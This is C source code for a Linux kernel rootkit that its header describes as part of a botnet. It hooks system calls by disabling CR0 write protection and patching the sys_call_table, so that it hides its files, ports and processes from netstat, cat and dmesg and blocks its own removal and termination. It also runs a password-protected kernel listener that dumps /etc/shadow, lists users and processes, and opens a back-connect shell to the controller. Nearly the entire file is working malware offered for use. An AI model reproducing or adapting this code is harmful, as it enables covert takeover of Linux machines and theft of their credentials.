/*
 * cr0security kernel space rootkit version 1.0
 * (c) Copyright by Cr0security All Rights Reserved
 * http://www.cr0security.com
 * 
 * this rootkit just a module of current botnet development (cr0security's botnet)
 *  features:
 *  - kernel space daemon :
 *      ~ check who's on the box remotely
 *      ~ view /etc/shadow remotely
 *      ~ on demand back connect
 *     ~ checking process remotely
 * - hiding files and directory
 * - hiding from netstat
 * - anti kill process
 * - prevent open, rm, rmmod, fake view
 * - hiding module
 *  Tested on : 
 * 	- linux 2.6.18-274.12.1.el5  - SMP -  x86_64 (CentOS)
 * 	- linux 2.6.18-238.19.1.el5PAE  - SMP - i686  (CentOS)
 *	- linux 2.6.32-279.2.1.el6.i686 (CentOS)
 *	- linux-3.3-rc6 - i686 (Debian) 
 *	- linux-2.6.35-22-generic - i686 (Debian)
 *	- linux-2.6.27.1 - i686 (Debian) 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */
#include <linux/highmem.h>
#include <linux/delay.h>
#include <linux/syscalls.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/version.h>
#ifdef CONFIG_SMP
#if(LINUX_VERSION_CODE <  KERNEL_VERSION(3,0,0))
#include <linux/smp_lock.h>
#endif
#endif
#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,33))
#include <generated/autoconf.h>
#else
#include <linux/autoconf.h>
#endif
#include <linux/sched.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <linux/types.h>
#include <linux/fcntl.h>
#include <net/sock.h>
#include <linux/in.h>
#include <linux/kthread.h>
#include <linux/vmalloc.h>
#include <linux/ctype.h>
#include "cr0security.h"

static inline void cr0security cr_sendmsg(cr0sock master_sock,char *msg_to_send,char *alternate_msg)
{
	cr0 filpo = 0;
	
	KERN
	if (strstr(msg_to_send,"cr0sec")) {
		log_path_buf3 = kmalloc(1012,GFP_KERNEL);
		log_path_buf3 = crflp_open(unknown_buffer);
		sockbuffer = kmalloc(1012,GFP_KERNEL);	
		Length6 = sprintf(sockbuffer, log_path_buf3);
	}
	else {
		sockbuffer = kmalloc(300,GFP_KERNEL);	
		if (executed == 0)
			Length6 = sprintf(sockbuffer,msg_to_send);
		else
			Length6 = sprintf(sockbuffer,alternate_msg);
	}
	cr_send(master_sock,sockbuffer,Length6);
	kfree(sockbuffer);
	if (filpo == 1) 
		kfree(log_path_buf3);
	END
}

static inline char *crinst(cr0 nomer)
{
	sprintf(hasil_konversi,"%d",nomer);
	return hasil_konversi;
}

inline unsigned long cr0security *cr_repop(void *cr0_argumen)
{
	cr0_heap = kmalloc(256,GFP_KERNEL);
	KERN
	r1m = copy_from_user(cr0_heap,cr0_argumen,255);
	END
	if ((strstr(cr0_heap,cr_PROC)) || (strstr(cr0_heap,"sbin")) || (strstr(cr0_heap,cr_cocoa))  || (strstr(cr0_heap,cr_panda))) 
		cr0_stat = TRUE;
	else  
		cr0_stat = FALSE;
	kfree(cr0_heap);
	if (cr0_stat == TRUE) 	
		 retback_val =   (unsigned long *) (-ENOENT);
	return retback_val;
}

static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr)
{
	cr0 panjang_cr_failed_epic = strlen(cr_failed_epic);
	
	KERN
	sockbuffer = kmalloc((panjang_cr_failed_epic+1),GFP_KERNEL);
	Length4 = sprintf(sockbuffer, "%s",cr_failed_epic);
	cr_send(master_sock,sockbuffer,Length4);
	kfree(sockbuffer);
	END
	return 0;
}	

static inline void cr0security userspace_elf(char *cmd)
{
	cr0 ret = 0;
	char *argv[] = {myprocessor,cmd,NULL}; 	
	char *envp[] = {"HOME=/","PATH=/sbin:/usr/sbin:/bin:/usr/bin",0};
	
	KERN
	ret = call_usermodehelper(myprocessor, argv,envp, 0);
	END
}

static inline cr0 cr0security umhbcs(char *ipx)
{
	cr0 ret = 0;
	char *argv[] = {myprocessor,"bcs",ipx, NULL};
	char *envp[] = {"HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", 0};
	
	KERN
	ret = call_usermodehelper(myprocessor, argv, envp, 0);
	END
	return ret;
}

static inline ssize_t cr0security cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3)
{
	h4x0rmsg msg;
	ssize_t retme;
	
	KERN
	msg.msg_name = 0;
	msg.msg_namelen = 0;
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = NULL;
	msg.msg_controllen = 0;
	msg.msg_flags = MSG_NOSIGNAL;
	iov.iov_base = (char*) cr0_buffer; 
	iov.iov_len =  Length3; 
	retme = sock_recvmsg(master_sock, &msg, Length3, 0);
	END
	return retme;
}

static cr0 cr0security crdaemon(cr0sock master_sock,struct sockaddr_in master_addr)
{
	cr0 panjang_cr_console = strlen(cr_console);
	cr0 cr0_executed = 0;
	cr0 executed = 1;
	cr0 panjang_cr_motd = strlen(cr_motd);
	
	repeated_oops:
	switch (cr0_executed) {
		case 0:
		sockbuffer = kmalloc((panjang_cr_motd+1),GFP_KERNEL);	
		Length4 = sprintf(sockbuffer, "%s",cr_motd);
		KERN
		cr_send(master_sock,sockbuffer,Length4);
		END
		kfree(sockbuffer);	
		break;
		case 1:
		sockbuffer = kmalloc((panjang_cr_console+1),GFP_KERNEL);	
		Length4 = sprintf(sockbuffer, "%s",cr_console);
		KERN
		cr_send(master_sock,sockbuffer,Length4);
		END
		kfree(sockbuffer);	
		break;
		case 2:
		return -1;
		break;
	}
	while (1)  {		
			char cmd[70] = "";
			Length5 = 0;
			sockbuffer_cmd = kmalloc(70,GFP_KERNEL);
			KERN
			Length5 = cr_recvmsg(master_sock, sockbuffer_cmd, sizeof(sockbuffer_cmd));
			END
			if (Length5 > 0) {
				KERN
				snprintf(predict_buffer,70,"%s",sockbuffer_cmd);
				for (i = 0;i < 68;i++) {
					validchar = 0;
					for (j = 0;j < 66;j++) {
						if((int)predict_buffer[i] == (int)valid_char[j]) 
							validchar = 1;
					}
					if(validchar == 1) 
						cmd[i] = predict_buffer[i];
				}
				END
			}
			kfree(sockbuffer_cmd);
			if ((strlen(cmd) > 2)) {
				if ((strcmp(cmd,"exit") == 0) || (strstr(cmd,"ex"))) 
					 cr0_executed = 2;
				else {	
					executed = 0;
					printk("\ngot cmd : [%s]\n",cmd); 	
					if((strcmp(cmd,"shd") == 0) || (strstr(cmd,"sh"))) {
						KERN
						userspace_elf("shd");
						cr_sendmsg(master_sock,successfull_msg,failure);	
					        END
						cr0_executed = 1;						    
					}		
					else if ((strcmp(cmd,"who") == 0) || (strstr(cmd,"wh"))) {
					        KERN
						userspace_elf("who");
						cr_sendmsg(master_sock,successfull_msg,failure);	
						END
						cr0_executed = 1;		
					}	
					else if ((strcmp(cmd,"psa") == 0) || (strstr(cmd,"ps"))) {
						userspace_elf("psa");
						cr_sendmsg(master_sock,successfull_msg,failure);	
						END
						cr0_executed = 1;	
					}		
					else if ((strstr(cmd,"pr")) || (strcmp(cmd,"prt") == 0)) {
					        KERN
						cr_sendmsg(master_sock,"cr0security","cr0security");	
						END
						cr0_executed = 1;		
					}		
					else if ((strcmp(cmd,"bcs") == 0) || (strstr(cmd,"bc"))) {
						master_ip = kmalloc(16,GFP_KERNEL);
						KERN
						master_ip = inet_ntoa(&master_addr.sin_addr);
						executed = umhbcs(master_ip);
						sockbuffer = kmalloc(100,GFP_KERNEL);	
						Length6 = sprintf(sockbuffer, "\nback connect to [%s]\n",master_ip);
						cr_send(master_sock,sockbuffer,Length6);
						kfree(sockbuffer);	
						kfree(master_ip);
					    	END
					        cr0_executed = 1;	
					}
					else {
						KERN
						sockbuffer = kmalloc((panjang_cr_motd+1),GFP_KERNEL);	
						Length4 = sprintf(sockbuffer, "%s",cr_motd);
						cr_send(master_sock,sockbuffer,Length4);
						kfree(sockbuffer);	
						END
						cr0_executed = 1;
					}
				}
			}
			goto repeated_oops;
	}		
	return 0;
}

static inline char cr0security *crflp_open(char *unknown_buffer)
{
	char buf[1012]; 
	cr0 konter;
	
	char_array = 0;
	unknown_buffer = kmalloc(1012, GFP_KERNEL);
	tmpcharbuf = kmalloc(1, GFP_KERNEL);
	KERN
	raidon = filp_open(log_path, O_RDONLY, 0);
	sprintf(unknown_buffer, "\n");
	if(IS_ERR(raidon))
		sprintf(unknown_buffer,"\nfailed to execute your command sorry\n");
        else {
		konter = 0;
		memset(buf, 0x0, 1012);
		pointer = buf;
		/* extern ssize_t vfs_read(struct file *, char __user *, size_t, loff_t *); */
		while ((vfs_read(raidon, pointer + char_array, 1, &raidon->f_pos) == 1) && (konter < 1007)) {
			konter++;  
			if (pointer[char_array] == '\n' || char_array > 255)  
				sprintf(tmpcharbuf, "%c", pointer[char_array]);
			else {
				sprintf(tmpcharbuf, "%c", pointer[char_array]);
				char_array = 0;
			}		
			strcat(unknown_buffer, tmpcharbuf);
			memset(buf, 0x0, 1012);
			char_array++;		
		}		
	}
	filp_close(raidon,NULL);
	END
	kfree(tmpcharbuf);
	return unknown_buffer;
	kfree(unknown_buffer);
}

static inline void cr0security cr(void)
{
	unsigned long value;
	
	asm volatile("mov %%cr0,%0" : "=r" (value));
	if (value & 0x10000) {
		value &= ~0x00010000;
		asm volatile("mov %0,%%cr0": : "r" (value));
	}
	else   
		write_cr0 (read_cr0 () | 0x10000);
}

static cr0 cr0security init_cr_this_mod(void *arg)
{
	cr0sock server_sock,master_sock;
	struct sockaddr_in server_addr;
	struct sockaddr_in master_addr;
	cr0 retme, my_sockaddr_len, master_sockaddr_len;
	
	repeat_socket:
	already = FALSE;
	allow_signal(SIGKILL);
	master_sock = NULL;
	server_sock = NULL;
	KERN
	memset(&master_addr,0,sizeof(master_addr));
	memset(&server_addr,0,sizeof(server_addr));
	server_addr.sin_family = PF_INET;
	server_addr.sin_port = htons(int_cr_kern_port);
	server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
	my_sockaddr_len = sizeof(struct sockaddr_in);
	master_sockaddr_len = sizeof(struct sockaddr_in);
	result = sock_create(PF_INET, SOCK_STREAM, 0, &server_sock);
	if(result < 0) 
		return -1;
	if (server_sock==NULL) 
		return -1;
	bind = server_sock->ops->bind(server_sock, (struct sockaddr *) &server_addr, my_sockaddr_len);
	if (bind < 0)  
		return -1;
	listen = server_sock->ops->listen(server_sock,SOMAXCONN);
	if (listen < 0)
		return -1;
	KERN
	master_sock = (struct socket *)server_sock;
	retme = sock_create(server_sock->sk->sk_family, server_sock->type,server_sock->sk->sk_protocol, &master_sock);
	master_sock->type = server_sock->type;
	master_sock->ops = server_sock->ops;
	retme = server_sock->ops->accept(server_sock, master_sock, 0);
	if ((retme < 0) || (master_sock ==NULL))
		return -1;
	else	
		retme = master_sock->ops->getname(master_sock,( struct sockaddr *)&master_addr, &my_sockaddr_len, 2);
	if (master_sock == NULL) 
		return -1;
	Length = sprintf(cr0_buffer, "%s",the_pass);
	cr_send(master_sock, cr0_buffer, Length);
	END
	while ((1) && (already == FALSE)) {
		sockbuffer = kmalloc(256,GFP_KERNEL);
		KERN
		Length2 = cr_recvmsg(master_sock, sockbuffer, sizeof(sockbuffer));
		END
		if (Length2 > 0) {
			KERN
			panjang = strlen(password) - 1;
			clean_buffer = kmalloc(panjang,GFP_KERNEL);
			orig_len = panjang;
			clean_buffer = crtruncate(sockbuffer,panjang);
			total_pass = panjang + 10;
			mypassword = kmalloc(total_pass,GFP_KERNEL);
			sprintf(mypassword,"%s%s%s",password,null_terminate,null_terminate);
			END
			if(strstr(mypassword,clean_buffer)) {
				kfree(sockbuffer);
				kfree(mypassword);
				kfree(clean_buffer);
				goto letmein;
			}
			else {
				kfree(sockbuffer);	
				kfree(mypassword);
				kfree(clean_buffer);
				goto wrongway;
			}
		}
		kfree(sockbuffer);
	}
	wrongway:
	resumer(master_sock,master_addr);
	if (master_sock != NULL)   
		sock_release(master_sock);
	if (server_sock != NULL)  
		sock_release(server_sock);
	goto repeat_socket;
	letmein:
	gmon_ops_return =  crdaemon(master_sock,master_addr);
	if (master_sock != NULL)  
		sock_release(master_sock);
	if (server_sock != NULL) 
		sock_release(server_sock);
	goto repeat_socket;
//do {} while(!kthread_should_stop());
return 0;	
}

/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last)
{
char *ret_string_val;
cr0 i;
cr0 sisha;
printk("\nexecuting cr0_substring\n");
ret_string_val=(char*)kmalloc((cr0)(length_from_last),GFP_KERNEL);
sisha=len_original_string-length_from_last;	
for (i=len_original_string;i>sisha;i--) {
	printk("\ngot i : [%d]\n",i);
	printk("\ngot char val: %c\n",str[i]);
	}
i--;
printk("\ngot i : [%d]\n",i);
printk("\ngot char val: %c\n",str[i]);
return (char*)(ret_string_val);	
}
*/

static inline char* cr0security crtruncate(const char* str,cr0 len)
{
	char *str2;
	
	str2 = kmalloc((cr0)(len),GFP_KERNEL);
	if (strlen(str) == 0)  
		return (char*)(str);
	else {
		snprintf(str2,len,"%s",str);
		return (char*)(str2);
	}
      kfree(str2);
}

static inline char* cr0security replace_string(char *full_str,char *old_str, char *new_str)
{
	static char buffer[4096];
	char *p;
	
	if(!(p = strstr(full_str, old_str)))  
		return full_str;
	strncpy(buffer, full_str, p-full_str); 
	buffer[p-full_str] = '\0';
	sprintf(buffer+(p-full_str), "%s%s", new_str, p+strlen(old_str));
	return buffer;
}


static inline size_t cr0security cr_send(cr0sock master_sock, const char *Buffer, size_t Length)
{
	h4x0rmsg msg;
	
	KERN
	msg.msg_name = 0;
	msg.msg_namelen = 0;
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = NULL;
	msg.msg_controllen = 0;
	msg.msg_flags = MSG_NOSIGNAL;
	iov.iov_base = (char*) Buffer;
	iov.iov_len = Length;
	len2 = sock_sendmsg(master_sock,&msg,(size_t)(Length));
	END
	return len2;
}

/*inet_ntoa function taken from ksocket by @song.xian-guang@hotmail.com */
inline char *inet_ntoa(struct in_addr *in)
{
	char* str_ip = NULL;
	u_int32_t int_ip = 0;
	
	KERN
	str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL);
	if (!str_ip) 
		return NULL;
	else 
		memset(str_ip, 0, 16);
	int_ip = in->s_addr;
	sprintf(str_ip, "%d.%d.%d.%d",  (int_ip ) & 0xFF,(int_ip >> 8 ) & 0xFF,(int_ip >> 16) & 0xFF,(int_ip >> 24) & 0xFF);
	return str_ip;
	kfree(str_ip);
	END
}
/*eof ksocket's inet_ntoa*/

/*
brute forcing method to find sys_call_table ( Sorry, not for SMP )
modified for SMP from http://www.gadgetweb.de/linux/40-how-to-hijacking-the-syscall-table-on-latest-26x-kernel-systems.html
*/

unsigned long **find_sys_call_table(void) 
{
	unsigned long ptr;
	unsigned long **sctable;
	
	sctable = NULL;
	ptr = 0;
#ifdef CONFIG_SMP
	goto not_for_smp;
#else
	for (ptr = (unsigned long)&_unlock_kernel; ptr < (unsigned long)&loops_per_jiffy;ptr += sizeof(void *)) {
		unsigned long *p;
		p = (unsigned long *)ptr;
		if (p[__NR_close] == (unsigned long) sys_close) {
			sctable = (unsigned long **)p;
			return &sctable[0];
		}
	}
#endif
	not_for_smp:
	return NULL;
}

inline static asmlinkage unsigned long cr0security *cr_open(const char __user *filename,cr0 flags, cr0 mode)
{
	found=FALSE;
	tmpbuf = kmalloc(256,GFP_KERNEL);
	KERN
	r1m = copy_from_user(tmpbuf,filename,255); 
	END
	for (konter=0;konter < 7;konter++) {
		if (strstr(tmpbuf,forbidden_files_to_read[konter]))
			found=TRUE;
	}	   
	if (found == TRUE) 
		return (unsigned long *) (-ENOENT);	
	else
		return (unsigned long *) (open_asli) (filename,flags,mode);
	kfree(tmpbuf);
}

inline static asmlinkage unsigned long cr0security *cr_chdir(const char __user *filename)
{
	KERN
	cr0_stat = FALSE;
	cr_repop((void *)filename);
	if (cr0_stat == FALSE)
		retback_val =  (unsigned long *) (chdir_asli) (filename);
	END
	return retback_val;
}

inline static asmlinkage unsigned long cr0security *cr_rmdir(const char __user *pathname)
{
	cr0_stat = FALSE;
	cr_repop((void *)pathname);
	if (cr0_stat == FALSE)
		retback_val =  (unsigned long *) (rmdir_asli) (pathname);
	return retback_val;
}

inline static asmlinkage unsigned long cr0security *cr_rename(const char __user *oldname,const char __user *newname)
{
	rename_found = FALSE;
	rename_oldname = kmalloc(256,GFP_KERNEL);
	KERN
	r1m = copy_from_user(rename_oldname,oldname,255);
	END 	
	if ((strstr(rename_oldname,"cr0security")) || (strstr(rename_oldname,"sbin")))
		rename_found = TRUE;
	else {
		for (rename_konter = 0;rename_konter < 10;rename_konter++) {
			if (strstr(rename_oldname,forbidden_files_to_read[rename_konter]))
				rename_found = TRUE;
		}
	}	
	if (rename_found == TRUE)
		return (unsigned long *) (-ENOENT);		
	else
		return (unsigned long *) (rename_asli) (oldname,newname);
	kfree(rename_oldname);	
}

inline static asmlinkage unsigned long cr0security *cr_write(unsigned int fd, const char __user *buf,size_t count)
{
	status=7777;
	do_fake = FALSE;
	/*block grep*/
	kern_heap2 = kmalloc(count, GFP_KERNEL);
	r4m =  copy_from_user(kern_heap2, buf, count);
	if ((strstr(kern_heap2,cr_PROC))) {
		printk ("\nr4m found cr0security on buffer\n");
	}
	kfree(kern_heap2);
	if ((strstr(current->comm,"netstat")) || (strstr(current->comm,"|")) || (strstr(current->comm,"stat")) || (strstr(current->comm,"ss")) || (strstr(current->comm,"ip 
")) || (strstr(current->comm,"cat")) || (strstr(current->comm,"pic")) || (strstr(current->comm,"more")) || (strstr(current->comm,"head")))  {
		buf_modified = kmalloc(count,GFP_KERNEL);
		kern_heap = kmalloc(count,GFP_KERNEL);
		KERN
		r1m = copy_from_user(kern_heap,buf,count);
		END
		if (strstr(kern_heap,cr_PORT)) {
			KERN
			buf_modified = (const char __user*)crrepinval(kern_heap,buf,1);
			END
		}
		else if (strstr(kern_heap,string_cr_kern_port)) {
			KERN
			buf_modified = (const char __user*)crrepinval(kern_heap,buf,2);
			END
		}
		else if (strstr(kern_heap,cr_backconnect_PORT)) {
			KERN
			buf_modified = (const char __user*)crrepinval(kern_heap,buf,6);
			END
			}
			else if (strstr(kern_heap,cr_backconnect_PORT_HEX)) {
				KERN
				buf_modified = (const char __user*)crrepinval(kern_heap,buf,5);
				END
			}
			else if (strstr(kern_heap,cr_PORT_HEX)) {
				KERN
				buf_modified = (const char __user*)crrepinval(kern_heap,buf,3);
				END
			}
			else if (strstr(kern_heap,cr_kern_PORT_HEX)) {
				KERN
				buf_modified = (const char __user*)crrepinval(kern_heap,buf,4);
				END
			}
			kfree(kern_heap);
			if (do_fake == TRUE) {
				count = (size_t) panjang_fake_net;
				return  (unsigned long *) (write_asli) (fd, buf, count);
			}
			else if (do_fake_hex == TRUE) {
				count = (size_t) panjang_fake_net_hex;
				return (unsigned long *) (write_asli) (fd,buf,count);
			}
			else
				return  (unsigned long *) (write_asli) (fd, buf, count);
	}
	else if (strstr(current->comm,"dmesg")) {
		KERN
		ev1l_dmesg = filp_open(our_dmesg_path,O_RDONLY,0);
		END
		if (IS_ERR(ev1l_dmesg))
			goto close;
		else {
			dmesg_buffer = kmalloc(dmesg_size,GFP_KERNEL); 
			KERN
			ev1l_dmesg->f_op->read(ev1l_dmesg,dmesg_buffer,dmesg_size, &ev1l_dmesg->f_pos);
			r1m = copy_to_user((void*)buf,dmesg_buffer,dmesg_size);
			END
			count = dmesg_size;
			kfree(dmesg_buffer);
		}
		close:
		filp_close(ev1l_dmesg,NULL);
		return (unsigned long *) (write_asli) (fd,buf,count);
	}
	else {
		if ((strstr(buf,cr_PROC))) {
			char *kbuf = kmalloc(count,GFP_KERNEL);
			KERN      
			r1m = copy_from_user(kbuf,buf,count);
			END
			for (konter = 0;konter < 11;konter++) {
				KERN   
				if (strstr(current->comm,cmd_pawned_cmd[konter])) {
					if (strstr(kbuf,cr_PROC))
						status = 0;  
				}
				END
				crinst(cr_PID);
				KERN
				if ((strstr(current->comm,"pmap")) && (strstr(current->comm,hasil_konversi)) && (strstr(current->comm,"stat")))
					status = 2;
				END 
				if (konter2 < 7) {
					if (strstr(kbuf,hijacked_syscall[konter2]))
						status = 0;  
				}   
			}
		kfree(kbuf);
		}   
		switch (status) {
			case 0:
			k_m_a_l_l_o_c__b_u_f_f_e_r = kmalloc(256,GFP_KERNEL);
			memset(k_m_a_l_l_o_c__b_u_f_f_e_r, 0,255);
			KERN
			r1m = copy_to_user((void *)buf,k_m_a_l_l_o_c__b_u_f_f_e_r,255);
			END
			kfree(k_m_a_l_l_o_c__b_u_f_f_e_r); 
			retback_val = (unsigned long *) (write_asli) (fd,buf,count);
			case 2:
			retback_val =  (unsigned long *) (-ESRCH);
			break;
			case 7777:
			retback_val =  (unsigned long *) (write_asli) (fd, buf, count);
	    }
	    return retback_val;	
	}
}

static inline char cr0security *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode)
{
	if ((ev1lmode==1) || (ev1lmode==2) || (ev1lmode==6)) {
		panjang_fake_net = strlen(kern_heap);
		fake_net = vmalloc(panjang_fake_net);
		vmalloc_buffer = vmalloc(panjang_fake_net);
	}
	else {
		panjang_fake_net_hex = strlen(kern_heap);
		fake_net_hex = vmalloc(panjang_fake_net_hex);
		vmalloc_buffer = vmalloc(panjang_fake_net_hex);
	}
	switch (ev1lmode) {
		case 1:
		panjang_fake_net = strlen(kern_heap);
		fake_net = replace_string(kern_heap,cr_PORT,"*   ");
		break;
		case 2:
		panjang_fake_net = strlen(kern_heap);
		fake_net = replace_string(kern_heap,string_cr_kern_port,"*   ");		
		break;
		case 3:
		panjang_fake_net_hex = strlen(kern_heap);
		fake_net_hex = replace_string(kern_heap,cr_PORT_HEX,"0000");
		break;
		case 4:
		panjang_fake_net_hex = strlen(kern_heap);
		fake_net_hex = replace_string(kern_heap,cr_kern_PORT_HEX,"0000");
		break;
		case 5:
		panjang_fake_net_hex = strlen(kern_heap);
		fake_net_hex = replace_string(kern_heap,cr_backconnect_PORT_HEX,"0000");
		break;
		case 6:
		panjang_fake_net = strlen(kern_heap);
		fake_net = replace_string(kern_heap,cr_backconnect_PORT,"*   ");		
		break;
	}
	KERN
	if ((ev1lmode == 1) || (ev1lmode == 2) || (ev1lmode == 6)) {
		memcpy(vmalloc_buffer,fake_net,panjang_fake_net);
		r1m = copy_to_user((void*)buf,vmalloc_buffer,panjang_fake_net);
		vfree(fake_net);
	}
	else {
		memcpy(vmalloc_buffer,fake_net_hex,panjang_fake_net_hex);
		r1m = copy_to_user((void*)buf,vmalloc_buffer,panjang_fake_net_hex);
		vfree(fake_net_hex);
	}
	END
	vfree(vmalloc_buffer);
	return (char*)buf;
}

inline static asmlinkage unsigned long cr0security *cr_unlink(const char __user *pathname)
{
	cr0_stat = FALSE;
	cr_repop((void *)pathname);
	if (cr0_stat == FALSE)
		retback_val =  (unsigned long *) (*unlink_asli)(pathname);
	return retback_val;
}

#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
inline static asmlinkage unsigned long cr0security *cr_unlinkat(cr0 dfd, const char __user * pathname, cr0 flag)
{
	cr0_stat = FALSE;
	cr_repop((void *)pathname);
	if (cr0_stat == FALSE)
		retback_val =  (unsigned long *) (*unlinkat_asli)(dfd,pathname,flag);
	return retback_val;
}
#endif

inline static asmlinkage unsigned long cr0security *cr_kill(cr0 pid, cr0 sig)
{
	if ((should_i_disable_sys_kill > 0)) {
		crinst(pid);
		totheap = 6 + sizeof(hasil_konversi) + 8;
		file_buf = kmalloc(200,GFP_KERNEL);
		lemme_lemme_maho = kmalloc(totheap,GFP_KERNEL);
		sprintf(lemme_lemme_maho,"/proc/%s/cmdline",hasil_konversi);
	        KERN
		ev1l_proc = filp_open(lemme_lemme_maho,O_RDONLY,0);
	        END
		if (IS_ERR(ev1l_proc)) 
			goto closeme;	 
		else {
			KERN
			ev1l_proc->f_op->read(ev1l_proc, file_buf,50, &ev1l_proc->f_pos);
			END 
			if (strstr(file_buf,cr_PROC))
				return (unsigned long *) (-ESRCH);
			else
				return (unsigned long *) (*kill_asli)(pid,sig);
		}
	 closeme:
	 filp_close(ev1l_proc,NULL);
	 kfree(file_buf);
	 kfree(lemme_lemme_maho);
	}
	return (unsigned long *) (*kill_asli)(pid,sig);
}

/*init module for cr0security*/
static cr0 cr0security cr_start(void)
{
	printk("\nlet met start\n");
//list_del (&THIS_MODULE->list);
//try_module_get(THIS_MODULE);
	cr();
	KERN
	if (proto_sys_call == invalid) {
		proto_sys_call = (void *) *find_sys_call_table();
	}	
	END
	
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
	unlinkat_asli=(void *) (proto_sys_call[__NR_unlinkat]);	
#endif
	kill_asli = (void *) (proto_sys_call[__NR_kill]);	
	write_asli = (void *) (proto_sys_call[__NR_write]);	
	open_asli = (void *) (proto_sys_call[__NR_open]);	
	unlink_asli = (void *) (proto_sys_call[__NR_unlink]);	
	rename_asli = (void *) (proto_sys_call[__NR_rename]);
	rmdir_asli = (void *)	(proto_sys_call[__NR_rmdir]);
	chdir_asli= (void *) (proto_sys_call[__NR_chdir]);
	proto_sys_call[__NR_kill] = (unsigned long) *(cr_kill);
	proto_sys_call[__NR_open] = (unsigned long) *(cr_open);	
	proto_sys_call[__NR_unlink] = (unsigned long) *(cr_unlink);
	proto_sys_call[__NR_rmdir] = (unsigned long) *(cr_rmdir);
	proto_sys_call[__NR_rename] = (unsigned long) *(cr_rename);	
	proto_sys_call[__NR_chdir] = (unsigned long) *(cr_chdir);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))	
	proto_sys_call[__NR_unlinkat] = (unsigned long) *(cr_unlinkat);
#endif
	proto_sys_call[__NR_write] = (unsigned long)  *(cr_write);
	cr();
	KERN
	kernel_thread(init_cr_this_mod,NULL,0);
//tcpd_thread=kthread_run(init_cr_this_mod,NULL,"init cr0 tcpd");
	END
	return 0;
}

/*eof init module for cr0security*/
static void cr0security cr_end(void)
{
	printk("\nlet me end\n");
	cr();
	proto_sys_call[__NR_rmdir] = (unsigned long) *(rmdir_asli);
	proto_sys_call[__NR_rename] = (unsigned long) *(rename_asli);
	proto_sys_call[__NR_kill]  = (unsigned long)  *(kill_asli);
	proto_sys_call[__NR_write] = (unsigned long) *(write_asli);
	proto_sys_call[__NR_open] = (unsigned long) *(open_asli);
	proto_sys_call[__NR_unlink] = (unsigned long) *(unlink_asli);
	proto_sys_call[__NR_chdir] = (unsigned long) *(chdir_asli);	
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))	
	proto_sys_call[__NR_unlinkat] = (unsigned long) *(unlinkat_asli);
#endif	
	cr();
//kthread_stop(tcpd_thread);
}

module_init(cr_start);
module_exit(cr_end);
MODULE_AUTHOR("cr0security.com");
MODULE_LICENSE("GPL");